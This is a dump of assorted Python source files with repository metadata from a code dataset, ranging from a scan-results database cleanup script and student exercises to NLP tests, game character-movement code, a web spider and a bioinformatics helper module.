process_thread(global_retest_list, args.p, run_port_25_no_tls_command, zones_struct, zgrab_collection, "retest")
# Remove old entries from before the scan
if args.p == "443":
other_results = zgrab_collection.find({'data.tls': {"$exists": True}, 'data.tls.timestamp': {"$lt": now}})
for result in other_results:
zgrab_collection.update_one({"_id": ObjectId(result['_id'])}, {"$unset": {'data.tls': ""}})
elif args.p == "22":
if 'zgrab2' in global_zgrab_path:
other_results = zgrab_collection.find({'data.ssh': {"$exists": True}, 'data.ssh.timestamp': {"$lt": now}})
for result in other_results:
zgrab_collection.update_one({"_id": ObjectId(result['_id'])}, {"$unset": {'data.ssh': ""}})
else:
other_results = zgrab_collection.find({'data.xssh': {"$exists": True}, 'data.xssh.timestamp': {"$lt": now}})
for result in other_results:
zgrab_collection.update_one({"_id": ObjectId(result['_id'])}, {"$unset": {'data.xssh': ""}})
elif args.p == "25":
other_results = zgrab_collection.find({'data.smtp': {"$exists": True}, 'data.smtp.timestamp': {"$lt": now}})
for result in other_results:
zgrab_collection.update_one({"_id": ObjectId(result['_id'])}, {"$unset": {'data.smtp': ""}})
elif args.p == "465":
other_results = zgrab_collection.find({'data.smtps': {"$exists": True}, 'data.smtps.timestamp': {"$lt": now}})
for result in other_results:
zgrab_collection.update_one({"_id": ObjectId(result['_id'])}, {"$unset": {'data.smtps': ""}})
# Remove any completely empty entries
zgrab_collection.remove({'data': {}})
jobs_manager.record_job_complete()
now = datetime.now()
print("Complete: " + str(now))
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
b4e15b33e55d23e30e8e2f6b8a321eafb8f54723 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/309/usersdata/293/73227/submittedfiles/atm.py | 2c93c82af2e85472309450b343bbc2b08ab565f8 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
money=int(input("Digite um valor: "))
r1=money%20
r2=r1%10
r3=r2%5
r4=r3%2
d1=money//20
d2=r1//10
d3=r2//5
d4=r3//2
d5=r4//1
if money<0:
print("Valor inválido")
else:
    print(d1, d2, d3, d4, d5)
"[email protected]"
] | |
604bca4b8f0b2686a9201ccb1c91a2fd818f3ee0 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02836/s667985812.py | 1658fec98933a591e5a14d44dd868cbef7443c97 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | S = input()
leng = len(S)
count = 0
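# Compare the first half of S with the reversed second half; each mismatched pair needs one change,
# so printing half-length minus the number of matches gives the minimum edits to make S a palindrome
# (the middle character is ignored when the length is odd).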
if leng % 2 == 0:
S1 = S[:int(leng/2)]
S2 = S[int(leng/2):]
for i in range(int(leng/2)):
if S1[i] == S2[int(leng/2)-1-i]:
count += 1
print(int(leng/2)-count)
else:
S1 = S[:int(leng/2)]
S2 = S[int(leng/2)+1:]
for i in range(int(leng/2)):
if S1[i] == S2[int(leng/2)-1-i]:
count += 1
print(int(leng/2)-count)
| [
"[email protected]"
] | |
af2f0512e91ea49f71983aa68b1076a656ccefd2 | 090d43fb627fd1d91bb3d745f008485f15f8f189 | /wotw_highlighter/block_header.py | be74c109bcd8bee32e87936500abd1df1f77b06e | [
"ISC"
] | permissive | wizardsoftheweb/wotw-highlighter | 6153ebc50d574d963b060393591c76c44c13ba4c | f9c2c91f5ebc506192e81573942b4989c80ae2bb | refs/heads/master | 2021-04-25T11:24:12.816987 | 2018-02-24T23:21:16 | 2018-02-24T23:21:16 | 111,818,711 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,623 | py | """This file provides a class to attach a header to a block"""
from wotw_highlighter.block_options import BlockOptions
class BlockHeader(BlockOptions):
"""This class compiles and renders a block's header (if any)"""
RENDER_AN_OPTION_NOT_INCLUDED = ''
ERROR_NEED_blob_path_OR_TITLE = ValueError('''\
blob_path and alternate_title cannot both be empty when generating a header\
''')
def validate(self):
"""Overrides super validate"""
if self.blob_path is None and self.title is None:
raise self.ERROR_NEED_blob_path_OR_TITLE
@staticmethod
def construct_code_tab(contents, active=False):
"""
This convenience method wraps contents in the proper markup
Parameters:
contents: The contents of the tab
active: Whether or not the tab should be marked as active
"""
return (
'<div class="code-tab%s">'
'%s'
'</div>'
% (
(
' active'
if active
else ''
),
contents
)
)
def render_git_ref_name_tab(self):
"""Renders the VCS branch tab"""
if self.git_ref_name and 'HEAD' != self.git_ref_name:
return self.construct_code_tab(self.git_ref_name)
return self.RENDER_AN_OPTION_NOT_INCLUDED
def render_title_tab(self):
"""Renders the blob title"""
title = (
self.title
if self.title
else self.blob_path
)
return self.construct_code_tab(title, True)
def render_external_source_link_tab(self):
"""Renders the VCS link tab"""
if self.external_source_link:
tab_body = (
'<a target="_blank" href="%s">'
'view source <i class="fa fa-external-link"></i>'
'</a>'
% (self.external_source_link)
)
return self.construct_code_tab(tab_body)
return self.RENDER_AN_OPTION_NOT_INCLUDED
def render_full_header(self):
"""Renders the entire header row"""
return (
'<tr class="code-header">'
'<td></td>'
'<td class="code-header">'
'%s'
'%s'
'%s'
'</td>'
'</tr>'
% (
self.render_title_tab(),
self.render_git_ref_name_tab(),
self.render_external_source_link_tab()
)
)
def __str__(self):
return self.render_full_header()
| [
"[email protected]"
] | |
e4f9dcf65fe4ea8720044f55226e52e8eaf389c0 | bfe3973571b066865d451fb7276b73158c4bd889 | /code/AllenNLP_Modifications/allennlp_velmo30k/allennlp/tests/data/fields/text_field_test.py | faa5fabde756cecc6439ccda8abda64903c5200d | [
"Apache-2.0"
] | permissive | UKPLab/naacl2019-like-humans-visual-attacks | 85dd11f13ac57e1a0a2e5e7f4161f3e6588fb0ed | 0d4eb57c239125c0d7e0e827a9887e182f3deebd | refs/heads/master | 2022-12-05T06:36:53.994158 | 2021-02-08T08:51:57 | 2021-02-08T08:51:57 | 174,987,605 | 26 | 6 | Apache-2.0 | 2022-11-21T20:49:09 | 2019-03-11T11:38:48 | Python | UTF-8 | Python | false | false | 13,954 | py | # pylint: disable=no-self-use,invalid-name
from collections import defaultdict
from typing import Dict, List
import pytest
import numpy
from allennlp.data import Token, Vocabulary
from allennlp.data.fields import TextField
from allennlp.data.token_indexers import SingleIdTokenIndexer, TokenCharactersIndexer, TokenIndexer
from allennlp.common.testing import AllenNlpTestCase
from allennlp.common.checks import ConfigurationError
from allennlp.common.util import pad_sequence_to_length
class DictReturningTokenIndexer(TokenIndexer):
"""
A stub TokenIndexer that returns multiple arrays of different lengths.
"""
def count_vocab_items(self, token: Token, counter: Dict[str, Dict[str, int]]):
pass
def tokens_to_indices(self, tokens: List[Token],
vocabulary: Vocabulary,
index_name: str) -> Dict[str, List[int]]: # pylint: disable=unused-argument
return {
"token_ids": [10, 15] + \
[vocabulary.get_token_index(token.text, 'words') for token in tokens] + \
[25],
"additional_key": [22, 29]
}
def get_padding_token(self) -> int:
return 0
def get_padding_lengths(self, token: int) -> Dict[str, int]: # pylint: disable=unused-argument
return {}
def pad_token_sequence(self,
tokens: Dict[str, List[int]],
desired_num_tokens: Dict[str, int],
padding_lengths: Dict[str, int]) -> Dict[str, List[int]]: # pylint: disable=unused-argument
return {key: pad_sequence_to_length(val, desired_num_tokens[key]) for key, val in tokens.items()}
def get_keys(self, index_name: str) -> List[str]:
# pylint: disable=unused-argument,no-self-use
return ["token_ids", "additional_key"]
class TestTextField(AllenNlpTestCase):
def setUp(self):
self.vocab = Vocabulary()
self.vocab.add_token_to_namespace("sentence", namespace='words')
self.vocab.add_token_to_namespace("A", namespace='words')
self.vocab.add_token_to_namespace("A", namespace='characters')
self.vocab.add_token_to_namespace("s", namespace='characters')
self.vocab.add_token_to_namespace("e", namespace='characters')
self.vocab.add_token_to_namespace("n", namespace='characters')
self.vocab.add_token_to_namespace("t", namespace='characters')
self.vocab.add_token_to_namespace("c", namespace='characters')
super(TestTextField, self).setUp()
def test_field_counts_vocab_items_correctly(self):
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words")})
namespace_token_counts = defaultdict(lambda: defaultdict(int))
field.count_vocab_items(namespace_token_counts)
assert namespace_token_counts["words"]["This"] == 1
assert namespace_token_counts["words"]["is"] == 1
assert namespace_token_counts["words"]["a"] == 1
assert namespace_token_counts["words"]["sentence"] == 1
assert namespace_token_counts["words"]["."] == 1
assert list(namespace_token_counts.keys()) == ["words"]
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"characters": TokenCharactersIndexer("characters")})
namespace_token_counts = defaultdict(lambda: defaultdict(int))
field.count_vocab_items(namespace_token_counts)
assert namespace_token_counts["characters"]["T"] == 1
assert namespace_token_counts["characters"]["h"] == 1
assert namespace_token_counts["characters"]["i"] == 2
assert namespace_token_counts["characters"]["s"] == 3
assert namespace_token_counts["characters"]["a"] == 1
assert namespace_token_counts["characters"]["e"] == 3
assert namespace_token_counts["characters"]["n"] == 2
assert namespace_token_counts["characters"]["t"] == 1
assert namespace_token_counts["characters"]["c"] == 1
assert namespace_token_counts["characters"]["."] == 1
assert list(namespace_token_counts.keys()) == ["characters"]
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words"),
"characters": TokenCharactersIndexer("characters")})
namespace_token_counts = defaultdict(lambda: defaultdict(int))
field.count_vocab_items(namespace_token_counts)
assert namespace_token_counts["characters"]["T"] == 1
assert namespace_token_counts["characters"]["h"] == 1
assert namespace_token_counts["characters"]["i"] == 2
assert namespace_token_counts["characters"]["s"] == 3
assert namespace_token_counts["characters"]["a"] == 1
assert namespace_token_counts["characters"]["e"] == 3
assert namespace_token_counts["characters"]["n"] == 2
assert namespace_token_counts["characters"]["t"] == 1
assert namespace_token_counts["characters"]["c"] == 1
assert namespace_token_counts["characters"]["."] == 1
assert namespace_token_counts["words"]["This"] == 1
assert namespace_token_counts["words"]["is"] == 1
assert namespace_token_counts["words"]["a"] == 1
assert namespace_token_counts["words"]["sentence"] == 1
assert namespace_token_counts["words"]["."] == 1
assert set(namespace_token_counts.keys()) == {"words", "characters"}
def test_index_converts_field_correctly(self):
vocab = Vocabulary()
sentence_index = vocab.add_token_to_namespace("sentence", namespace='words')
capital_a_index = vocab.add_token_to_namespace("A", namespace='words')
capital_a_char_index = vocab.add_token_to_namespace("A", namespace='characters')
s_index = vocab.add_token_to_namespace("s", namespace='characters')
e_index = vocab.add_token_to_namespace("e", namespace='characters')
n_index = vocab.add_token_to_namespace("n", namespace='characters')
t_index = vocab.add_token_to_namespace("t", namespace='characters')
c_index = vocab.add_token_to_namespace("c", namespace='characters')
field = TextField([Token(t) for t in ["A", "sentence"]],
{"words": SingleIdTokenIndexer(namespace="words")})
field.index(vocab)
# pylint: disable=protected-access
assert field._indexed_tokens["words"] == [capital_a_index, sentence_index]
field1 = TextField([Token(t) for t in ["A", "sentence"]],
{"characters": TokenCharactersIndexer(namespace="characters")})
field1.index(vocab)
assert field1._indexed_tokens["characters"] == [[capital_a_char_index],
[s_index, e_index, n_index, t_index,
e_index, n_index, c_index, e_index]]
field2 = TextField([Token(t) for t in ["A", "sentence"]],
token_indexers={"words": SingleIdTokenIndexer(namespace="words"),
"characters": TokenCharactersIndexer(namespace="characters")})
field2.index(vocab)
assert field2._indexed_tokens["words"] == [capital_a_index, sentence_index]
assert field2._indexed_tokens["characters"] == [[capital_a_char_index],
[s_index, e_index, n_index, t_index,
e_index, n_index, c_index, e_index]]
# pylint: enable=protected-access
def test_get_padding_lengths_raises_if_no_indexed_tokens(self):
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words")})
with pytest.raises(ConfigurationError):
field.get_padding_lengths()
def test_padding_lengths_are_computed_correctly(self):
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
assert padding_lengths == {"num_tokens": 5}
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"characters": TokenCharactersIndexer("characters")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
assert padding_lengths == {"num_tokens": 5, "num_token_characters": 8}
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"characters": TokenCharactersIndexer("characters"),
"words": SingleIdTokenIndexer("words")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
assert padding_lengths == {"num_tokens": 5, "num_token_characters": 8}
def test_as_tensor_handles_words(self):
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
tensor_dict = field.as_tensor(padding_lengths)
numpy.testing.assert_array_almost_equal(tensor_dict["words"].detach().cpu().numpy(),
numpy.array([1, 1, 1, 2, 1]))
def test_as_tensor_handles_longer_lengths(self):
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
padding_lengths["num_tokens"] = 10
tensor_dict = field.as_tensor(padding_lengths)
numpy.testing.assert_array_almost_equal(tensor_dict["words"].detach().cpu().numpy(),
numpy.array([1, 1, 1, 2, 1, 0, 0, 0, 0, 0]))
def test_as_tensor_handles_characters(self):
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"characters": TokenCharactersIndexer("characters")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
tensor_dict = field.as_tensor(padding_lengths)
expected_character_array = numpy.array([[1, 1, 1, 3, 0, 0, 0, 0],
[1, 3, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0],
[3, 4, 5, 6, 4, 5, 7, 4],
[1, 0, 0, 0, 0, 0, 0, 0]])
numpy.testing.assert_array_almost_equal(tensor_dict["characters"].detach().cpu().numpy(),
expected_character_array)
def test_as_tensor_handles_words_and_characters_with_longer_lengths(self):
field = TextField([Token(t) for t in ["a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words"),
"characters": TokenCharactersIndexer("characters")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
padding_lengths["num_tokens"] = 5
padding_lengths["num_token_characters"] = 10
tensor_dict = field.as_tensor(padding_lengths)
numpy.testing.assert_array_almost_equal(tensor_dict["words"].detach().cpu().numpy(),
numpy.array([1, 2, 1, 0, 0]))
numpy.testing.assert_array_almost_equal(tensor_dict["characters"].detach().cpu().numpy(),
numpy.array([[1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[3, 4, 5, 6, 4, 5, 7, 4, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]))
def test_printing_doesnt_crash(self):
field = TextField([Token(t) for t in ["A", "sentence"]],
{"words": SingleIdTokenIndexer(namespace="words")})
print(field)
def test_token_embedder_returns_dict(self):
field = TextField([Token(t) for t in ["A", "sentence"]],
token_indexers={"field_with_dict": DictReturningTokenIndexer(),
"words": SingleIdTokenIndexer("words"),
"characters": TokenCharactersIndexer("characters")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
assert padding_lengths == {
'token_ids': 5,
'additional_key': 2,
'words': 2,
'characters': 2,
'num_token_characters': 8
}
padding_lengths['token_ids'] = 7
padding_lengths['additional_key'] = 3
padding_lengths['words'] = 4
padding_lengths['characters'] = 4
tensors = field.as_tensor(padding_lengths)
assert list(tensors['token_ids'].shape) == [7]
assert list(tensors['additional_key'].shape) == [3]
assert list(tensors['words'].shape) == [4]
assert list(tensors['characters'].shape) == [4, 8]
| [
"[email protected]"
] | |
d7e3a030d9c4566cdb0b31432119685df41159a8 | 045cb1a5638c3575296f83471758dc09a8065725 | /addons/pos_kitchen_printer/models/__init__.py | a1b6a6939adf5937fd8371d0fb565ad87d39edb1 | [] | no_license | marionumza/saas | 7236842b0db98d1a0d0c3c88df32d268509629cb | 148dd95d991a348ebbaff9396759a7dd1fe6e101 | refs/heads/main | 2023-03-27T14:08:57.121601 | 2021-03-20T07:59:08 | 2021-03-20T07:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | # -*- coding: utf-8 -*-
# Part of Harpiya. See LICENSE file for full copyright and licensing details.
from . import pos_order
| [
"[email protected]"
] | |
d415c73efb114941108de5cc70bf361106a5cb61 | 9655434fa24cff892af8a6a54fc448ef7075926a | /scrapy框架/day07/redisSpiderPro/redisSpiderPro/spiders/redisSpiderTest.py | db9f1980547be6a56ec5fd15b5ca791643ba9bd8 | [] | no_license | chenrun666/Spider | acaa6849726417e0df56d4e43b52fd1de22ac1d8 | 2ec2e5621d0eaa15d2a2bcc2fa11642a9441888c | refs/heads/master | 2020-04-09T04:42:05.168983 | 2019-01-15T13:21:40 | 2019-01-15T13:21:40 | 160,032,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 943 | py | # -*- coding: utf-8 -*-
import scrapy
from scrapy_redis.spiders import RedisSpider
from redisSpiderPro.items import RedisspiderproItem
class RedisspidertestSpider(RedisSpider):
name = 'redisSpiderTest'
#allowed_domains = ['www.xxx,com']
#start_urls = ['http://www.xxx,com/']
    redis_key = 'data'  # name of the scheduler queue in Redis
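    # scrapy-redis pulls start URLs from this Redis key, so several spider processes pointed at the same
    # Redis instance share one crawl queue; seed it with e.g. "lpush data <first detail URL>" (illustrative).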
url = 'http://db.pharmcube.com/database/cfda/detail/cfda_cn_instrument/'
pageNum = 1
def parse(self, response):
num = response.xpath('/html/body/div/table/tbody/tr[1]/td[2]/text()').extract_first()
name = response.xpath('/html/body/div/table/tbody/tr[2]/td[2]/text()').extract_first()
item = RedisspiderproItem()
item['num'] = num
item['name'] = name
yield item
if self.pageNum <= 10000:
self.pageNum += 1
new_url = self.url + str(self.pageNum)
yield scrapy.Request(url=new_url,callback=self.parse)
| [
"[email protected]"
] | |
019b201d3703f4bbb1cdb006dd59a50afff07dcd | 7949f96ee7feeaa163608dbd256b0b76d1b89258 | /toontown/classicchars/CharStateDatas.py | 26ffd583121582f0f54056dcb7f70c5766f0c052 | [] | no_license | xxdecryptionxx/ToontownOnline | 414619744b4c40588f9a86c8e01cb951ffe53e2d | e6c20e6ce56f2320217f2ddde8f632a63848bd6b | refs/heads/master | 2021-01-11T03:08:59.934044 | 2018-07-27T01:26:21 | 2018-07-27T01:26:21 | 71,086,644 | 8 | 10 | null | 2018-06-01T00:13:34 | 2016-10-17T00:39:41 | Python | UTF-8 | Python | false | false | 10,549 | py | # File: t (Python 2.4)
from pandac.PandaModules import *
from direct.interval.IntervalGlobal import *
from direct.distributed.ClockDelta import *
from direct.fsm import StateData
from direct.directnotify import DirectNotifyGlobal
from direct.showbase.PythonUtil import *
from direct.task import Task
import CCharPaths
from toontown.toonbase import ToontownGlobals
class CharNeutralState(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('CharNeutralState')
def __init__(self, doneEvent, character):
StateData.StateData.__init__(self, doneEvent)
self._CharNeutralState__doneEvent = doneEvent
self.character = character
def enter(self, startTrack = None, playRate = None):
StateData.StateData.enter(self)
self.notify.debug('Neutral ' + self.character.getName() + '...')
self._CharNeutralState__neutralTrack = Sequence(name = self.character.getName() + '-neutral')
if startTrack:
self._CharNeutralState__neutralTrack.append(startTrack)
if playRate:
self._CharNeutralState__neutralTrack.append(Func(self.character.setPlayRate, playRate, 'neutral'))
self._CharNeutralState__neutralTrack.append(Func(self.character.loop, 'neutral'))
self._CharNeutralState__neutralTrack.start()
def exit(self):
StateData.StateData.exit(self)
self._CharNeutralState__neutralTrack.finish()
def _CharNeutralState__doneHandler(self):
doneStatus = { }
doneStatus['state'] = 'walk'
doneStatus['status'] = 'done'
messenger.send(self._CharNeutralState__doneEvent, [
doneStatus])
return Task.done
class CharWalkState(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('CharWalkState')
def __init__(self, doneEvent, character, diffPath = None):
StateData.StateData.__init__(self, doneEvent)
self.doneEvent = doneEvent
self.character = character
if diffPath == None:
self.paths = CCharPaths.getPaths(character.getName(), character.getCCLocation())
else:
self.paths = CCharPaths.getPaths(diffPath, character.getCCLocation())
self.speed = character.walkSpeed()
self.offsetX = 0
self.offsetY = 0
self.oldOffsetX = 0
self.olfOffsetY = 0
self.walkTrack = None
def enter(self, startTrack = None, playRate = None):
StateData.StateData.enter(self)
self.notify.debug('Walking ' + self.character.getName() + '... from ' + str(self.walkInfo[0]) + ' to ' + str(self.walkInfo[1]))
posPoints = CCharPaths.getPointsFromTo(self.walkInfo[0], self.walkInfo[1], self.paths)
lastPos = posPoints[-1]
newLastPos = Point3(lastPos[0] + self.offsetX, lastPos[1] + self.offsetY, lastPos[2])
posPoints[-1] = newLastPos
firstPos = posPoints[0]
newFirstPos = Point3(firstPos[0] + self.oldOffsetX, firstPos[1] + self.oldOffsetY, firstPos[2])
posPoints[0] = newFirstPos
self.walkTrack = Sequence(name = self.character.getName() + '-walk')
if startTrack:
self.walkTrack.append(startTrack)
self.character.setPos(posPoints[0])
raycast = CCharPaths.getRaycastFlag(self.walkInfo[0], self.walkInfo[1], self.paths)
moveTrack = self.makePathTrack(self.character, posPoints, self.speed, raycast)
if playRate:
self.walkTrack.append(Func(self.character.setPlayRate, playRate, 'walk'))
self.walkTrack.append(Func(self.character.loop, 'walk'))
self.walkTrack.append(moveTrack)
doneEventName = self.character.getName() + 'WalkDone'
self.walkTrack.append(Func(messenger.send, doneEventName))
ts = globalClockDelta.localElapsedTime(self.walkInfo[2])
self.accept(doneEventName, self.doneHandler)
self.notify.debug('walkTrack.start(%s)' % ts)
self.walkTrack.start(ts)
def makePathTrack(self, nodePath, posPoints, velocity, raycast = 0):
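        # Builds a Sequence that walks nodePath through posPoints at the given velocity: at each segment it
        # turns toward the next point along the shortest angle (the 270.0 divisor is the turn rate in
        # degrees per second) and then lerps position for the remaining segment time.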
track = Sequence()
if raycast:
track.append(Func(nodePath.enableRaycast, 1))
startHpr = nodePath.getHpr()
for pointIndex in range(len(posPoints) - 1):
startPoint = posPoints[pointIndex]
endPoint = posPoints[pointIndex + 1]
track.append(Func(nodePath.setPos, startPoint))
distance = Vec3(endPoint - startPoint).length()
duration = distance / velocity
curHpr = nodePath.getHpr()
nodePath.headsUp(endPoint[0], endPoint[1], endPoint[2])
destHpr = nodePath.getHpr()
reducedCurH = reduceAngle(curHpr[0])
reducedCurHpr = Vec3(reducedCurH, curHpr[1], curHpr[2])
reducedDestH = reduceAngle(destHpr[0])
shortestAngle = closestDestAngle(reducedCurH, reducedDestH)
shortestHpr = Vec3(shortestAngle, destHpr[1], destHpr[2])
turnTime = abs(shortestAngle) / 270.0
nodePath.setHpr(shortestHpr)
if duration - turnTime > 0.01:
track.append(Parallel(Func(nodePath.loop, 'walk'), LerpHprInterval(nodePath, turnTime, shortestHpr, startHpr = reducedCurHpr, name = 'lerp' + nodePath.getName() + 'Hpr'), LerpPosInterval(nodePath, duration = duration - turnTime, pos = Point3(endPoint), startPos = Point3(startPoint), fluid = 1)))
continue
nodePath.setHpr(startHpr)
if raycast:
track.append(Func(nodePath.enableRaycast, 0))
return track
def doneHandler(self):
doneStatus = { }
doneStatus['state'] = 'walk'
doneStatus['status'] = 'done'
messenger.send(self.doneEvent, [
doneStatus])
return Task.done
def exit(self):
StateData.StateData.exit(self)
self.ignore(self.character.getName() + 'WalkDone')
if self.walkTrack:
self.walkTrack.finish()
self.walkTrack = None
def setWalk(self, srcNode, destNode, timestamp, offsetX = 0, offsetY = 0):
self.oldOffsetX = self.offsetX
self.oldOffsetY = self.offsetY
self.walkInfo = (srcNode, destNode, timestamp)
self.offsetX = offsetX
self.offsetY = offsetY
class CharFollowChipState(CharWalkState):
notify = DirectNotifyGlobal.directNotify.newCategory('CharFollowChipState')
completeRevolutionDistance = 13
def __init__(self, doneEvent, character, chipId):
CharWalkState.__init__(self, doneEvent, character)
self.offsetDict = {
'a': (ToontownGlobals.DaleOrbitDistance, 0) }
self.chipId = chipId
def setWalk(self, srcNode, destNode, timestamp, offsetX = 0, offsetY = 0):
self.offsetDict[destNode] = (offsetX, offsetY)
self.srcNode = srcNode
self.destNode = destNode
self.orbitDistance = ToontownGlobals.DaleOrbitDistance
if (srcNode, destNode) in CCharPaths.DaleOrbitDistanceOverride:
self.orbitDistance = CCharPaths.DaleOrbitDistanceOverride[(srcNode, destNode)]
elif (destNode, srcNode) in CCharPaths.DaleOrbitDistanceOverride:
self.orbitDistance = CCharPaths.DaleOrbitDistanceOverride[(destNode, srcNode)]
CharWalkState.setWalk(self, srcNode, destNode, timestamp, offsetX, offsetY)
def makePathTrack(self, nodePath, posPoints, velocity, raycast = 0):
retval = Sequence()
if raycast:
retval.append(Func(nodePath.enableRaycast, 1))
chip = base.cr.doId2do.get(self.chipId)
self.chipPaths = CCharPaths.getPaths(chip.getName(), chip.getCCLocation())
self.posPoints = posPoints
chipDuration = chip.walk.walkTrack.getDuration()
self.notify.debug('chipDuration = %f' % chipDuration)
chipDistance = CCharPaths.getWalkDistance(self.srcNode, self.destNode, ToontownGlobals.ChipSpeed, self.chipPaths)
self.revolutions = chipDistance / self.completeRevolutionDistance
srcOffset = (0, 0)
if self.srcNode in self.offsetDict:
srcOffset = self.offsetDict[self.srcNode]
srcTheta = math.atan2(srcOffset[1], srcOffset[0])
if srcTheta < 0:
srcTheta += 2 * math.pi
if srcTheta > 0:
srcRev = (2 * math.pi - srcTheta) / 2 * math.pi
else:
srcRev = 0
self.srcTheta = srcTheta
destOffset = (0, 0)
if self.destNode in self.offsetDict:
destOffset = self.offsetDict[self.destNode]
destTheta = math.atan2(destOffset[1], destOffset[0])
if destTheta < 0:
destTheta += 2 * math.pi
self.destTheta = destTheta
self.revolutions += srcRev
endingTheta = srcTheta + (self.revolutions % 1.0) * 2 * math.pi
diffTheta = destTheta - endingTheta
destRev = diffTheta / 2 * math.pi
self.revolutions += destRev
while self.revolutions < 1:
self.revolutions += 1
def positionDale(t):
self.orbitChip(t)
retval.append(LerpFunctionInterval(positionDale, chipDuration))
if raycast:
retval.append(Func(nodePath.enableRaycast, 0))
return retval
def orbitChip(self, t):
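        # t runs from 0 to 1 over Chip's walk: Dale's position is Chip's interpolated position plus an
        # offset of orbitDistance at angle curTheta, which advances by self.revolutions full turns during
        # the walk; the heading is derived from the same angle.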
srcOffset = (0, 0)
if self.srcNode in self.offsetDict:
srcOffset = self.offsetDict[self.srcNode]
chipSrcPos = Point3(self.posPoints[0][0] - srcOffset[0], self.posPoints[0][1] - srcOffset[1], self.posPoints[0][2])
destOffset = (0, 0)
if self.destNode in self.offsetDict:
destOffset = self.offsetDict[self.destNode]
chipDestPos = Point3(self.posPoints[-1][0] - destOffset[0], self.posPoints[-1][1] - destOffset[1], self.posPoints[-1][2])
displacement = chipDestPos - chipSrcPos
displacement *= t
chipPos = chipSrcPos + displacement
diffTheta = t * self.revolutions * 2 * math.pi
curTheta = self.srcTheta + diffTheta
newOffsetX = math.cos(curTheta) * self.orbitDistance
newOffsetY = math.sin(curTheta) * self.orbitDistance
dalePos = Point3(chipPos[0] + newOffsetX, chipPos[1] + newOffsetY, chipPos[2])
self.character.setPos(dalePos)
newHeading = rad2Deg(curTheta)
newHeading %= 360
self.character.setH(newHeading)
| [
"[email protected]"
] | |
d6aef98a8cc8710fdc5ffecf706514f2625f6753 | efebd5c42f5e5048d0db2022a7f1115605f403a2 | /dnanexus/encode_idr/resources/home/dnanexus/common.py | f47f951370dccf22c885c0a1fe3038e8cec65374 | [] | no_license | crazyhottommy/chip-seq-pipeline | d5854d01bcf99d82d7f830c9513a1320d806e83b | 44163d89d8649d8193e62ff4c49b113b01038703 | refs/heads/master | 2020-04-05T23:28:50.538573 | 2015-08-12T12:43:58 | 2015-08-12T12:43:58 | 42,424,548 | 2 | 2 | null | 2015-09-14T03:16:54 | 2015-09-14T03:16:54 | null | UTF-8 | Python | false | false | 8,518 | py | #!/usr/bin/env python
import sys, os, subprocess, shlex, logging, re, urlparse
import dateutil.parser
def test():
print "In common.test"
def rstrips(string, substring):
if not string.endswith(substring):
return string
else:
return string[:len(string)-len(substring)]
def touch(fname, times=None):
with open(fname, 'a'):
os.utime(fname, times)
def block_on(command):
process = subprocess.Popen(shlex.split(command), stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
for line in iter(process.stdout.readline, ''):
sys.stdout.write(line)
process.wait()
return process.returncode
def run_pipe(steps, outfile=None):
#break this out into a recursive function
#TODO: capture stderr
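    # Chains the given shell command strings with pipes (cmd1 | cmd2 | ...), optionally sending the last
    # stage's stdout to outfile, and returns (stdout, stderr) of the final process.
    # Illustrative use: run_pipe(['sort -k1,1 -k2,2n peaks.bed', 'uniq'], 'peaks.sorted.bed')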
from subprocess import Popen, PIPE
p = None
p_next = None
first_step_n = 1
last_step_n = len(steps)
for n,step in enumerate(steps, start=first_step_n):
print "step %d: %s" %(n,step)
if n == first_step_n:
